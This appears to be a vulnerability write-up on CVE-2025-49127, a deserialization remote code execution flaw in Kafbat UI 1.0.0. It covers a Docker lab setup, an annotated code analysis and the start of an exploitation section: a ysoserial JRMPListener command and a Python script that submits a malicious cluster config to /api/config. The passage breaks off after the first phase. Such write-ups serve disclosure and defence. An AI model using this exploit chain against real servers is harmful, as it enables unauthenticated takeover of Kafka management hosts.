CVE-2025-49127 is a critical remote code execution vulnerability affecting Kafbat UI version 1.0.0. This vulnerability allows any unauthenticated user to execute arbitrary code on the server through unsafe deserialization when connecting to malicious JMX services. The issue stems from the application’s dynamic cluster configuration functionality that accepts user-provided JMX endpoints without proper validation, leading to unsafe deserialization attacks when the application attempts to connect to attacker-controlled JMX servers.
CVE Details:
- CVE ID: CVE-2025-49127
- CVSS Score: Critical
- Affected Version: Kafbat UI 1.0.0
- Fixed Version: 1.1.0
- Vulnerability Type: Unsafe Deserialization / Remote Code Execution
- Attack Vector: Network
- Authentication Required: None
What is Kafbat UI?
Kafbat UI is a web-based user interface designed for managing Apache Kafka clusters. It provides administrators with an intuitive dashboard to monitor, configure, and manage Kafka environments. The application offers several key features:
- Cluster Management: Dynamic addition and configuration of Kafka clusters
- Metrics Collection: Integration with JMX and Prometheus for monitoring broker performance
- Topic Management: Creation, deletion, and configuration of Kafka topics
- Consumer Group Monitoring: Real-time tracking of consumer group offsets and lag
- Schema Registry Integration: Management of Avro, JSON, and Protobuf schemas
- Connect Cluster Management: Integration with Kafka Connect for connector management
The application supports dynamic configuration changes, allowing administrators to add new clusters and modify settings without requiring application restarts. This flexibility, while convenient, introduces the security vulnerability when combined with unsafe JMX connections.
Lab Setup
To reproduce this vulnerability, we need to set up a vulnerable Kafbat UI environment and create the malicious infrastructure for exploitation.
Step 1: Prepare the Environment
# Create working directory
mkdir kafbat-ui-cve-lab
cd kafbat-ui-cve-lab
# Download the modified ysoserial tool
wget
https://github.com/trganda/ysoserial/releases/download/v0.0.6/ysoserial-0.0.6-all.jar
# Create scripts directorymkdir scripts
Step 2: Create the Docker Compose
Configuration
Create a docker-compose.yml file with the vulnerable setup:
version: '3.8'
name: "kafbat-ui-cve-lab"
services:
zookeeper:
image: 'confluentinc/cp-zookeeper:7.6.1'
environment:
ZOOKEEPER_CLIENT_PORT: 2181
kafbat-ui:
container_name: kafbat-ui
image: ghcr.io/kafbat/kafka-ui:v1.0.0 # Vulnerable version
ports:
- 8080:8080
- 5005:5005
depends_on:
- kafka0
environment:
KAFKA_CLUSTERS_0_NAME: local
KAFKA_CLUSTERS_0_BOOTSTRAPSERVERS: kafka0:29092
KAFKA_CLUSTERS_0_METRICS_PORT: 9997
DYNAMIC_CONFIG_ENABLED: 'true' # Enable dynamic configuration
JAVA_TOOL_OPTIONS: '-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=*:5005'
kafka0:
image: confluentinc/cp-kafka:7.2.1
hostname: kafka0
container_name: kafka0
ports:
- 9092:9092
- 9997:9997
environment:
KAFKA_BROKER_ID: 1
KAFKA_LISTENER_SECURITY_PROTOCOL_MAP: PLAINTEXT:PLAINTEXT,CONTROLLER:PLAINTEXT,PLAINTEXT_HOST:PLAINTEXT
KAFKA_ADVERTISED_LISTENERS: PLAINTEXT://kafka0:29092,PLAINTEXT_HOST://localhost:9092
KAFKA_INTER_BROKER_LISTENER_NAME: PLAINTEXT
KAFKA_OFFSETS_TOPIC_REPLICATION_FACTOR: 1
KAFKA_GROUP_INITIAL_REBALANCE_DELAY_MS: 0
KAFKA_TRANSACTION_STATE_LOG_MIN_ISR: 1
KAFKA_TRANSACTION_STATE_LOG_REPLICATION_FACTOR: 1
KAFKA_PROCESS_ROLES: 'broker,controller'
KAFKA_NODE_ID: 1
KAFKA_CONTROLLER_QUORUM_VOTERS: '1@kafka0:29093'
KAFKA_LISTENERS: 'PLAINTEXT://kafka0:29092,CONTROLLER://kafka0:29093,PLAINTEXT_HOST://0.0.0.0:9092'
KAFKA_CONTROLLER_LISTENER_NAMES: 'CONTROLLER'
KAFKA_LOG_DIRS: '/tmp/kraft-combined-logs'
KAFKA_JMX_PORT: 9997
KAFKA_JMX_OPTS: -Dcom.sun.management.jmxremote -Dcom.sun.management.jmxremote.authenticate=false -Dcom.sun.management.jmxremote.ssl=false -Djava.rmi.server.hostname=kafka0 -Dcom.sun.management.jmxremote.rmi.port=9997
# Malicious Kafka broker that advertises evil JMX endpoint
kafka-malicious-broker:
image: 'confluentinc/cp-kafka:7.2.1'
depends_on:
- zookeeper
ports:
- 9093:9093
environment:
KAFKA_ZOOKEEPER_CONNECT: 'zookeeper:2181'
# Replace with your actual host IP - this is where the malicious JMX server will run
KAFKA_ADVERTISED_LISTENERS: PLAINTEXT://YOUR_HOST_IP:9093
KAFKA_LISTENER_SECURITY_PROTOCOL_MAP: PLAINTEXT:PLAINTEXT
KAFKA_INTER_BROKER_LISTENER_NAME: PLAINTEXT
Step 3: Start the Environment
# Replace YOUR_HOST_IP with your actual host IP
sed -i 's/YOUR_HOST_IP/192.168.1.100/g' docker-compose.yml
# Start the environment
docker-compose up -d
# Verify services are running
docker-compose ps
Step 4: Verify Kafbat UI Access
Navigate to http://localhost:8080 to ensure Kafbat UI is running and accessible.
The Analysis
The vulnerability in CVE-2025-49127 represents a sophisticated multi-layered security flaw that exploits the dynamic configuration capabilities of Kafbat UI through unsafe Java deserialization in JMX connections. The attack leverages the application’s legitimate metrics collection functionality to establish connections to attacker-controlled JMX servers, which then return malicious serialized objects that execute arbitrary code when deserialized by the client application.

The vulnerability originates in the ApplicationConfigController class, which handles dynamic configuration changes through the /api/config REST endpoint. When examining the validateConfig method, we can see that it begins by constructing an access context using AccessContext.builder().applicationConfigActions(EDIT).operationName(“validateConfig”).build(), which is intended to enforce role-based access control. However, the critical flaw emerges when we analyze how the default configuration often has authentication disabled through auth.type: DISABLED, effectively bypassing this security mechanism. The method then proceeds to process the incoming configuration by calling configDto.flatMap(config -> {, followed by an unsafe mapping operation DynamicConfigOperations.PropertiesStructure newConfig = MAPPER.fromDto(config.getProperties()) that directly converts user-provided input into internal data structures without any sanitization or validation of the cluster configuration contents.
ApplicationConfigController.java – validateConfig method:
@Override
public Mono<ResponseEntity<ApplicationConfigValidationDTO>> validateConfig(Mono<ApplicationConfigDTO> configDto,
ServerWebExchange exchange) {
// ISSUE 1: Access control bypass potential
var context = AccessContext.builder()
.applicationConfigActions(EDIT) // Requires EDIT permission
.operationName("validateConfig")
.build();
return validateAccess(context) // RBAC check happens here
.then(configDto) // Process incoming configuration
.flatMap(config -> {
// ISSUE 2: Unsafe mapping from DTO without sanitization
DynamicConfigOperations.PropertiesStructure newConfig = MAPPER.fromDto(config.getProperties());
ClustersProperties clustersProperties = newConfig.getKafka();
// CRITICAL: This triggers the vulnerable validation chain
return validateClustersConfig(clustersProperties)
.map(validations -> new ApplicationConfigValidationDTO().clusters(validations));
})
.map(ResponseEntity::ok)
.doOnEach(sig -> audit(context, sig)); // Audit after potential exploitation
}
The most critical aspect of this vulnerability lies in the subsequent call to validateClustersConfig(clustersProperties), which triggers a validation chain that has the dangerous side effect of initiating actual connections to user-specified endpoints. This validation process is fundamentally flawed because it treats validation as an active operation rather than a passive check, meaning that simply submitting a malicious configuration can trigger the exploitation regardless of whether the configuration is ultimately accepted or rejected by the system. The configuration persistence mechanism reveals additional security flaws in the restartWithConfig method, where malicious configurations are written directly to disk through dynamicConfigOperations.persist(newConfig) without deep validation, and the system automatically restarts with restarter.requestRestart(), loading the malicious configuration system-wide and creating a persistent attack vector.
ApplicationConfigController.java – restartWithConfig method:
@Override
public Mono<ResponseEntity<Void>> restartWithConfig(Mono<RestartRequestDTO> restartRequestDto,
ServerWebExchange exchange) {
var context = AccessContext.builder()
.applicationConfigActions(EDIT)
.operationName("restartWithConfig")
.build();
return validateAccess(context)
.then(restartRequestDto)
.doOnNext(restartDto -> {
// ISSUE 3: Configuration persisted without deep validation
var newConfig = MAPPER.fromDto(restartDto.getConfig().getProperties());
dynamicConfigOperations.persist(newConfig); // Writes malicious config to disk
})
.doOnEach(sig -> audit(context, sig))
.doOnSuccess(dto -> restarter.requestRestart()) // ISSUE 4: Triggers app restart with malicious config
.map(dto -> ResponseEntity.ok().build());
}
Moving deeper into the configuration processing layer, the DynamicConfigOperations class reveals additional security weaknesses in how configurations are persisted and loaded. The persist method begins with a call to checkIfDynamicConfigEnabled(), which only verifies that the dynamic configuration feature is enabled but performs no content validation. The method then calls properties.initAndValidate(), but examining the implementation of this validation reveals that it only performs basic structural validation through ClustersProperties::validateAndSetDefaults and does not inspect the actual values being configured, particularly the JMX endpoint specifications that are central to this vulnerability.
DynamicConfigOperations.java – persist method:
public void persist(PropertiesStructure properties) {
checkIfDynamicConfigEnabled(); // Only checks if feature is enabled
properties.initAndValidate(); // ISSUE: Insufficient validation
String yaml = serializeToYaml(properties); // Serializes malicious config
writeYamlToFile(yaml, dynamicConfigFilePath()); // Writes to disk without deep inspection
}
The persistence mechanism itself introduces additional security risks through the writeYamlToFile method, which serializes the malicious configuration using String yaml = serializeToYaml(properties) and writes it directly to disk with Files.writeString(path, yaml, StandardOpenOption.CREATE, StandardOpenOption.WRITE, StandardOpenOption.TRUNCATE_EXISTING). This operation occurs without any deep content inspection or validation of the YAML structure, meaning that malicious JMX configurations become permanently stored on the filesystem.
DynamicConfigOperations.java – writeYamlToFile method:
@SneakyThrows
private void writeYamlToFile(String yaml, Path path) {
// ISSUE: No content validation of YAML before writing
if (Files.isDirectory(path)) {
throw new ValidationException("Dynamic file path is a directory, but should be a file path");
}
if (!Files.exists(path.getParent())) {
Files.createDirectories(path.getParent());
}
if (Files.exists(path) && !Files.isWritable(path)) {
throw new ValidationException("File already exists and is not writable");
}
try {
Files.writeString(path, yaml, // VULNERABLE: Writes malicious YAML
StandardOpenOption.CREATE,
StandardOpenOption.WRITE,
StandardOpenOption.TRUNCATE_EXISTING
);
} catch (IOException e) {
throw new ValidationException("Error writing to " + path, e);
}
}
The configuration loading process compounds this issue through the loadDynamicPropertySource method, which automatically loads these potentially malicious configurations at application startup using new YamlPropertySourceLoader().load(“dynamicProperties”, new FileSystemResource(configPath)), creating a persistent attack vector that survives application restarts.
DynamicConfigOperations.java – loadDynamicPropertySource method:
@SneakyThrows
public Optional<PropertySource<?>> loadDynamicPropertySource() {
if (dynamicConfigEnabled()) {
Path configPath = dynamicConfigFilePath();
if (!Files.exists(configPath) || !Files.isReadable(configPath)) {
log.warn("Dynamic config file {} doesnt exist or not readable", configPath);
return Optional.empty();
}
var propertySource = new CompositePropertySource("dynamicProperties");
new YamlPropertySourceLoader()
.load("dynamicProperties", new FileSystemResource(configPath)) // VULNERABLE: Loads malicious YAML
.forEach(propertySource::addPropertySource);
log.info("Dynamic config loaded from {}", configPath);
return Optional.of(propertySource);
}
return Optional.empty();
}
The KafkaClusterFactory class demonstrates another critical vulnerability in the cluster creation process. The create method constructs cluster objects directly from user-provided configuration properties without validation, particularly in how it handles metrics configuration through metricsConfigDataToMetricsConfig(clusterProperties.getMetrics()). This method creates a MetricsConfig object where both the type and port are directly copied from user input using builder.type(metricsConfigData.getType()) and builder.port(metricsConfigData.getPort()), with no validation to ensure these values are safe or reasonable. The type field accepts “JMX” without question, which triggers the vulnerable code path, while the port field accepts any integer value specified by the attacker.
KafkaClusterFactory.java
KafkaClusterFactory.java – create method:
public KafkaCluster create(ClustersProperties properties,
ClustersProperties.Cluster clusterProperties) {
KafkaCluster.KafkaClusterBuilder builder = KafkaCluster.builder();
builder.name(clusterProperties.getName());
builder.bootstrapServers(clusterProperties.getBootstrapServers()); // User-controlled
builder.properties(convertProperties(clusterProperties.getProperties()));
builder.readOnly(clusterProperties.isReadOnly());
// ... other configurations ...
if (metricsConfigured(clusterProperties)) {
// CRITICAL: Creates metrics config from user input without validation
builder.metricsConfig(metricsConfigDataToMetricsConfig(clusterProperties.getMetrics()));
}
builder.originalProperties(clusterProperties); // Preserves original malicious config
return builder.build();
}
KafkaClusterFactory.java – metricsConfigDataToMetricsConfig method:
@Nullable
private MetricsConfig metricsConfigDataToMetricsConfig(ClustersProperties.MetricsConfigData metricsConfigData) {
if (metricsConfigData == null) {
return null;
}
MetricsConfig.MetricsConfigBuilder builder = MetricsConfig.builder();
builder.type(metricsConfigData.getType()); // ISSUE: Type not validated ("JMX" accepted)
builder.port(metricsConfigData.getPort()); // ISSUE: Port not validated (attacker-controlled)
builder.ssl(Optional.ofNullable(metricsConfigData.getSsl()).orElse(false));
builder.username(metricsConfigData.getUsername()); // Can be null
builder.password(metricsConfigData.getPassword()); // Can be null
builder.keystoreLocation(metricsConfigData.getKeystoreLocation());
builder.keystorePassword(metricsConfigData.getKeystorePassword());
return builder.build();
}
Perhaps most critically, the cluster validation process in the validate method completely fails to validate JMX endpoints. While the method performs validation for Kafka connections, Schema Registry, KSQL, and Connect endpoints through respective validation calls, there is no corresponding validation for JMX metrics endpoints. This represents a fundamental design flaw where the application validates most external connections but completely ignores the security implications of JMX connections, allowing malicious JMX configurations to pass validation unconditionally.
KafkaClusterFactory.java – validate method:
public Mono<ClusterConfigValidationDTO> validate(ClustersProperties.Cluster clusterProperties) {
// SSL validation - not related to JMX vulnerability
if (clusterProperties.getSsl() != null) {
Optional<String> errMsg = KafkaServicesValidation.validateTruststore(clusterProperties.getSsl());
if (errMsg.isPresent()) {
return Mono.just(new ClusterConfigValidationDTO()
.kafka(new ApplicationPropertyValidationDTO()
.error(true)
.errorMessage("Truststore not valid: " + errMsg.get())));
}
}
return Mono.zip(
// Validates Kafka connection - NOT JMX
KafkaServicesValidation.validateClusterConnection(
clusterProperties.getBootstrapServers(),
convertProperties(clusterProperties.getProperties()),
clusterProperties.getSsl()
),
// Schema Registry validation (not JMX related)
schemaRegistryConfigured(clusterProperties)
? KafkaServicesValidation.validateSchemaRegistry(() -> schemaRegistryClient(clusterProperties)).map(Optional::of)
: Mono.<Optional<ApplicationPropertyValidationDTO>>just(Optional.empty()),
// KSQL validation (not JMX related)
ksqlConfigured(clusterProperties)
? KafkaServicesValidation.validateKsql(() -> ksqlClient(clusterProperties)).map(Optional::of)
: Mono.<Optional<ApplicationPropertyValidationDTO>>just(Optional.empty()),
// Connect validation (not JMX related)
connectClientsConfigured(clusterProperties) ?
Flux.fromIterable(clusterProperties.getKafkaConnect())
.flatMap(c -> KafkaServicesValidation.validateConnect(() -> connectClient(clusterProperties, c))
.map(r -> Tuples.of(c.getName(), r)))
.collectMap(Tuple2::getT1, Tuple2::getT2)
.map(Optional::of)
: Mono.<Optional<Map<String, ApplicationPropertyValidationDTO>>>just(Optional.empty())
).map(tuple -> {
var validation = new ClusterConfigValidationDTO();
validation.kafka(tuple.getT1());
tuple.getT2().ifPresent(validation::schemaRegistry);
tuple.getT3().ifPresent(validation::ksqldb);
tuple.getT4().ifPresent(validation::kafkaConnects);
return validation;
// CRITICAL OBSERVATION: NO JMX VALIDATION PERFORMED!
});
}
The vulnerability is triggered automatically through the ClustersStatisticsScheduler, which contains a scheduled method annotated with @Scheduled(fixedRateString = “${kafka.update-metrics-rate-millis:30000}”) that executes every 30 seconds by default. This scheduler iterates through all configured clusters using Flux.fromIterable(clustersStorage.getKafkaClusters()) and calls statisticsService.updateCache(cluster) for each one, including any malicious clusters that have been configured. The use of .parallel().runOn(Schedulers.parallel()) means that multiple clusters are processed simultaneously, and the final .block() call makes the entire operation synchronous, meaning that exploitation of one cluster can potentially affect the stability of the entire application.
ClustersStatisticsScheduler.java – updateStatistics method:
@Scheduled(fixedRateString = "${kafka.update-metrics-rate-millis:30000}")
public void updateStatistics() {
Flux.fromIterable(clustersStorage.getKafkaClusters()) // Includes malicious clusters
.parallel()
.runOn(Schedulers.parallel())
.flatMap(cluster -> {
log.debug("Start getting metrics for kafkaCluster: {}", cluster.getName());
return statisticsService.updateCache(cluster) // TRIGGERS VULNERABILITY
.doOnSuccess(m -> log.debug("Metrics updated for cluster: {}", cluster.getName()));
})
.then()
.block(); // Synchronous execution
}
The StatisticsService orchestrates the metrics collection process through its getStatistics method, which includes a call to metricsCollector.getBrokerMetrics(cluster, description.getNodes()) as part of a larger Mono.zip operation. This call occurs within the normal application flow and is not treated as a potentially dangerous operation, meaning there are no additional security measures or safeguards applied. The method retrieves broker nodes from the Kafka cluster description and passes them directly to the metrics collector, which then attempts to collect metrics from each node using the configured JMX settings.
StatisticsService.java – getStatistics method:
private Mono<Statistics> getStatistics(KafkaCluster cluster) {
return adminClientService.get(cluster).flatMap(ac ->
ac.describeCluster().flatMap(description ->
ac.updateInternalStats(description.getController()).then(
Mono.zip(
List.of(
metricsCollector.getBrokerMetrics(cluster, description.getNodes()), // VULNERABLE CALL
getLogDirInfo(description, ac),
featureService.getAvailableFeatures(ac, cluster, description),
loadTopicConfigs(cluster),
describeTopics(cluster)),
results ->
Statistics.builder()
.status(ServerStatusDTO.ONLINE)
.clusterDescription(description)
.version(ac.getVersion())
.metrics((Metrics) results[0]) // Contains exploited metrics
.logDirInfo((InternalLogDirStats) results[1])
.features((List<ClusterFeature>) results[2])
.topicConfigs((Map<String, List<ConfigEntry>>) results[3])
.topicDescriptions((Map<String, TopicDescription>) results[4])
.build()
))))
.doOnError(e -> log.error("Failed to collect cluster {} info", cluster.getName(), e))
.onErrorResume(e -> Mono.just(Statistics.empty().toBuilder().lastKafkaException(e).build()));
}
The MetricsCollector class contains the logic that determines whether to use JMX or Prometheus for metrics collection. In the getMetrics method, the decision is made through a simple type check: if (type == null || type.equalsIgnoreCase(MetricsConfig.JMX_METRICS_TYPE)), which reveals that JMX is the default choice when no type is specified or when explicitly set to “JMX”. This default behavior is dangerous because it means that any cluster configuration that includes metrics settings will attempt JMX connections unless explicitly configured otherwise. The method then makes a direct call to jmxMetricsRetriever.retrieve(kafkaCluster, node), which initiates the vulnerable connection process.
MetricsCollector.java – getBrokerMetrics and getMetrics methods:
public Mono<Metrics> getBrokerMetrics(KafkaCluster cluster, Collection<Node> nodes) {
return Flux.fromIterable(nodes)
.flatMap(n -> getMetrics(cluster, n).map(lst -> Tuples.of(n, lst))) // VULNERABLE: Processes each node
.collectMap(Tuple2::getT1, Tuple2::getT2)
.map(nodeMetrics -> collectMetrics(cluster, nodeMetrics))
.defaultIfEmpty(Metrics.empty());
}
private Mono<List<RawMetric>> getMetrics(KafkaCluster kafkaCluster, Node node) {
Flux<RawMetric> metricFlux = Flux.empty();
if (kafkaCluster.getMetricsConfig() != null) {
String type = kafkaCluster.getMetricsConfig().getType();
// CRITICAL: JMX type triggers vulnerable code path
if (type == null || type.equalsIgnoreCase(MetricsConfig.JMX_METRICS_TYPE)) {
metricFlux = jmxMetricsRetriever.retrieve(kafkaCluster, node); // VULNERABLE CALL
} else if (type.equalsIgnoreCase(MetricsConfig.PROMETHEUS_METRICS_TYPE)) {
metricFlux = prometheusMetricsRetriever.retrieve(kafkaCluster, node);
}
}
return metricFlux.collectList();
}
The core of the vulnerability resides in the JmxMetricsRetriever class, specifically in the retrieveSync method. This method performs unsafe string concatenation to construct the JMX URL using String jmxUrl = JMX_URL + node.host() + “:” + c.getMetricsConfig().getPort() + “/” + JMX_SERVICE_TYPE. Breaking down this construction reveals the security flaw: JMX_URL is the constant “service:jmx:rmi:///jndi/rmi://”, node.host() comes directly from the user-controlled bootstrap servers configuration, c.getMetricsConfig().getPort() comes from the user-controlled metrics port configuration, and JMX_SERVICE_TYPE is the constant “jmxrmi”. This results in a URL like “service:jmx:rmi:///jndi/rmi://ATTACKER_HOST:ATTACKER_PORT/jmxrmi” where both the host and port are completely controlled by the attacker.
JmxMetricsRetriever.java
JmxMetricsRetriever.java – retrieveSync method:
@SneakyThrows
private List<RawMetric> retrieveSync(KafkaCluster c, Node node) {
// VULNERABILITY 1: Unsafe string concatenation with user-controlled input
String jmxUrl = JMX_URL + node.host() + ":" + c.getMetricsConfig().getPort() + "/" + JMX_SERVICE_TYPE;
/*
* Breaking down the URL construction:
* - JMX_URL = "service:jmx:rmi:///jndi/rmi://" (constant)
* - node.host() = USER CONTROLLED via bootstrapServers config
* - c.getMetricsConfig().getPort() = USER CONTROLLED via metrics.port config
* - JMX_SERVICE_TYPE = "jmxrmi" (constant)
*
* Result: service:jmx:rmi:///jndi/rmi://ATTACKER_HOST:ATTACKER_PORT/jmxrmi
*/
log.debug("Collection JMX metrics for {}", jmxUrl);
List<RawMetric> result = new ArrayList<>();
// VULNERABILITY 2: Connects to attacker-controlled endpoint
withJmxConnector(jmxUrl, c, jmxConnector -> getMetricsFromJmx(jmxConnector, result));
log.debug("{} metrics collected for {}", result.size(), jmxUrl);
return result;
}
The actual connection attempt occurs in the withJmxConnector method, which first prepares the connection environment through prepareJmxEnvAndSetThreadLocal(c) and then creates a JMX connector using JMXConnectorFactory.newJMXConnector(new JMXServiceURL(jmxUrl), env). The critical vulnerability is triggered when the code calls connector.connect(env), which initiates an RMI handshake with the attacker-controlled server. This connection process is where the unsafe deserialization occurs, as the JMX protocol inherently uses Java serialization for communication between client and server.
JmxMetricsRetriever.java – withJmxConnector method:
private void withJmxConnector(String jmxUrl,
KafkaCluster c,
Consumer<JMXConnector> consumer) {
var env = prepareJmxEnvAndSetThreadLocal(c); // Prepare connection environment
try (JMXConnector connector = JMXConnectorFactory.newJMXConnector(new JMXServiceURL(jmxUrl), env)) {
try {
// VULNERABILITY 3: Unsafe connection to attacker endpoint
connector.connect(env);
/*
* This is where the deserialization vulnerability is triggered:
* 1. JMXConnector.connect() initiates RMI handshake
* 2. RMI protocol uses Java serialization for object exchange
* 3. Malicious JMX server returns crafted serialized objects
* 4. Client-side deserialization occurs without filtering
* 5. Gadget chains (e.g., CommonsCollections) execute arbitrary code
*/
} catch (Exception exception) {
log.error("Error connecting to {}", jmxUrl, exception);
return; // Early return on connection failure
}
consumer.accept(connector); // Process successful connection
} catch (Exception e) {
log.error("Error getting jmx metrics from {}", jmxUrl, e);
} finally {
JmxSslSocketFactory.clearThreadLocalContext(); // Clean up SSL context
}
}
During the RMI handshake and subsequent JMX operations, multiple deserialization points exist where malicious objects can be injected. The initial connection handshake involves object exchange between client and server, where the server can return crafted serialized objects that trigger deserialization on the client side. Additional deserialization occurs during MBean operations when the code calls msc.queryNames(new ObjectName(CANONICAL_NAME_PATTERN), null) to query for MBeans matching “kafka.server*:*”, and when individual attributes are retrieved through msc.getAttribute(objectName, attrNames[i].getName()). Each of these operations involves serialization and deserialization of Java objects, providing multiple opportunities for exploitation.
JmxMetricsRetriever.java – getMetricsFromJmx method:
@SneakyThrows
private void getMetricsFromJmx(JMXConnector jmxConnector, List<RawMetric> sink) {
MBeanServerConnection msc = jmxConnector.getMBeanServerConnection(); // Get MBean server connection
var jmxMetrics = msc.queryNames(new ObjectName(CANONICAL_NAME_PATTERN), null); // Query MBeans
/*
* CANONICAL_NAME_PATTERN = "kafka.server*:*"
* This queries for all MBeans matching Kafka server pattern
*
* VULNERABILITY 4: Additional deserialization risk
* - queryNames() can trigger additional deserialization
* - ObjectName creation can be exploited
* - Response processing involves more deserialization
*/
for (ObjectName jmxMetric : jmxMetrics) {
sink.addAll(extractObjectMetrics(jmxMetric, msc)); // Extract individual metrics
}
}
JmxMetricsRetriever.java – extractObjectMetrics method:
@SneakyThrows
private List<RawMetric> extractObjectMetrics(ObjectName objectName, MBeanServerConnection msc) {
MBeanAttributeInfo[] attrNames = msc.getMBeanInfo(objectName).getAttributes(); // Get attribute info
Object[] attrValues = new Object[attrNames.length];
for (int i = 0; i < attrNames.length; i++) {
attrValues[i] = msc.getAttribute(objectName, attrNames[i].getName()); // Get attribute values
/*
* VULNERABILITY 5: Multiple deserialization points
* - getMBeanInfo() involves deserialization
* - getAttribute() involves deserialization
* - Each call can be exploited by malicious server
*/
}
return JmxMetricsFormatter.constructMetricsList(objectName, attrNames, attrValues);
}
The attack relies on Java deserialization gadget chains, which are sequences of existing classes that can be chained together to achieve arbitrary code execution when deserialized. Common gadgets like CommonsCollections7 work by starting with a serialized object that, when deserialized, triggers a chain of method calls including Hashtable.readObject(), which leads to Hashtable.reconstitutionPut(), then to LazyMap.get(), followed by ChainedTransformer.transform(), and finally to InvokerTransformer.transform() which can execute arbitrary code through Runtime.exec(). This entire chain executes automatically during the deserialization process without any additional user interaction.
The SSL socket factory implementation in JmxSslSocketFactory adds another layer of complexity and potential exploitation. The static initialization block uses reflection to modify JVM internals through Field defaultSocketFactoryField = SslRMIClientSocketFactory.class.getDeclaredField(“defaultSocketFactory”) followed by defaultSocketFactoryField.set(null, new JmxSslSocketFactory()), which replaces the default SSL socket factory with a custom implementation. This custom factory allows for per-connection SSL configuration through thread-local variables, but it also means that connections to attacker-controlled hosts will use this custom factory, potentially providing additional attack vectors through SSL certificate validation bypasses or SSL context manipulation.
JmxSslSocketFactory.java – static initialization and createSocket method:
static {
boolean sslJmxSupported = false;
try {
// VULNERABILITY 6: Reflection-based modification of JVM internals
Field defaultSocketFactoryField = SslRMIClientSocketFactory.class.getDeclaredField("defaultSocketFactory");
defaultSocketFactoryField.setAccessible(true);
defaultSocketFactoryField.set(null, new JmxSslSocketFactory()); // Replaces default factory
sslJmxSupported = true;
} catch (Exception e) {
log.error("SSL can't be enabled for JMX retrieval. "
+ "Make sure your java app run with '--add-opens java.rmi/javax.rmi.ssl=ALL-UNNAMED' arg. Err: {}",
e.getMessage());
log.trace("SSL can't be enabled for JMX retrieval", e);
}
SSL_JMX_SUPPORTED = sslJmxSupported;
}
@Override
public Socket createSocket(String host, int port) throws IOException {
var hostAndPort = new HostAndPort(host, port);
// Check cache first
if (CACHED_FACTORIES.containsKey(hostAndPort)) {
return CACHED_FACTORIES.get(hostAndPort).createSocket(host, port); // Use cached factory
} else if (threadLocalContextSet()) {
var factory = createFactoryFromThreadLocalCtx(); // Create new factory
CACHED_FACTORIES.put(hostAndPort, factory); // Cache it
return factory.createSocket(host, port); // VULNERABLE: Connect to attacker host
}
return defaultSocketFactory.createSocket(host, port); // Fallback to default
}
The configuration structure defined in ClustersProperties allows for these malicious configurations to be easily constructed and submitted. The MetricsConfigData class accepts a type field that can be set to “JMX” to trigger the vulnerable code path, a port field that accepts any integer value for the attacker-controlled port, and optional username and password fields that can be left null to avoid authentication requirements. The default configuration behavior is particularly dangerous, as shown in the setMetricsDefaults method which automatically sets the metrics type to JMX when not specified: cluster.getMetrics().setType(MetricsConfig.JMX_METRICS_TYPE).
ClustersProperties.java – MetricsConfigData class and setMetricsDefaults method:
@Data
@ToString(exclude = "password")
public static class MetricsConfigData {
String type; // ISSUE: "JMX" triggers vulnerable code
Integer port; // ISSUE: Attacker-controlled port
Boolean ssl;
String username; // Can be null (no authentication)
String password; // Can be null (no authentication)
String keystoreLocation;
String keystorePassword;
}
private void setMetricsDefaults() {
for (Cluster cluster : clusters) {
if (cluster.getMetrics() != null && !StringUtils.hasText(cluster.getMetrics().getType())) {
cluster.getMetrics().setType(MetricsConfig.JMX_METRICS_TYPE); // DANGEROUS DEFAULT
}
}
}
The exploitation timeline reveals how quickly this attack can be executed. At T+0, an attacker submits a malicious configuration through the /api/config endpoint. By T+5, the configuration has been validated and potentially persisted to disk. At T+30, the scheduled metrics collection process automatically triggers, initiating a JMX connection to the attacker-controlled server. The RMI handshake begins at T+32, and by T+33, the malicious JMX server sends crafted serialized objects back to the client. Client-side deserialization occurs at T+34, triggering the gadget chain and achieving arbitrary code execution by T+35. This entire process occurs automatically without any additional user interaction once the malicious configuration is submitted, making it a particularly dangerous vulnerability that can achieve persistent compromise through the scheduled execution mechanism.
Exploitation
The exploitation process involves setting up malicious JMX servers using ysoserial and triggering the vulnerable code path through configuration API calls.
Step 1: Set Up Malicious JMX Server for Initial Attack
First, we’ll set up a JMX server that enables unsafe deserialization:
# Terminal 1: Set up JMX server to enable unsafe deserialization
java -cp ysoserial-0.0.6-all.jar ysoserial.exploit.JRMPListener 1718 ScalaProperties "org.apache.commons.collections.enableUnsafeSerialization:true"
This creates a malicious JMX server on port 1718 that will:
- Accept incoming JMX connections
- Return a ScalaProperties payload that enables unsafe deserialization
- Set the system property to allow Commons Collections deserialization
Step 2: Trigger Initial Exploit
Now send the malicious configuration to enable unsafe deserialization:
#!/usr/bin/env python3
"""
CVE-2025-49127 Exploit - Initial Setup Phase
Enables unsafe deserialization by setting system properties
"""
import requests
import json
# Configuration for the initial exploit
KAFBAT_UI_URL = "http://localhost:8080"
ATTACKER_HOST = "192.168.1.100" # Replace with your host IP
JMX_PORT_INITIAL = 1718
def send_malicious_config(jmx_port, cluster_name="poc-initial"):
"""Send malicious cluster configuration to trigger JMX connection"""
config_payload = {
"config": {
"properties": {
"auth": {
"type": "DISABLED"
},
"rbac": {
"roles": []
},
"webclient": {},
"kafka": {
"clusters": [
{
"name": "local",
"bootstrapServers": "kafka0:29092",
"schemaRegistry": "http://schema-registry0:8085",
"ksqldbServer": "http://ksqldb0:8088",
"kafkaConnect": [
{
"name": "first",
"address": "http://kafka-connect0:8083"
}
],
"metrics": {
"type": "JMX",
"port": 9997
},
"properties": {},
"readOnly": False,
"audit": {
"topicAuditEnabled": True,
"consoleAuditEnabled": True,
"auditTopicProperties": {}
}
},
{
"name": cluster_name,
"bootstrapServers": f"kafka-malicious-broker:9093",
"metrics": {
"type": "JMX",
"port": jmx_port # Attacker-controlled port
},
"properties": {},
"readOnly": False
}
]
}
}
}
}
headers = {
"Content-Type": "application/json",
"Accept": "*/*",
"User-Agent": "CVE-2025-49127-Exploit/1.0"
}
try:
response = requests.put(
f"{KAFBAT_UI_URL}/api/config",
headers=headers,
json=config_payload,
timeout=30
)
print(f"[+] Request sent to {KAFBAT_UI_URL}/api/config")
print(f"[+] Status Code: {response.status_code}")
print(f"[+] Response Length: {len(response.text)}")
if response.status_code == 200:
print("[+] Configuration accepted - JMX connection should be triggered")
else:
print(f"[-] Unexpected status code: {response.status_code}")
print(f"[-] Response: {response.text}")
except requests.exceptions.RequestException as e:
print(f"[-] Error sending request: {e}")
if __name__ == "__main__":
print("[*] CVE-2025-49127 Exploitation - Phase 1: Enable Unsafe Deserialization")
print(f"[*] Target: {KAFBAT_UI_URL}")
print(f"[*] Attacker Host: {ATTACKER_HOST}")
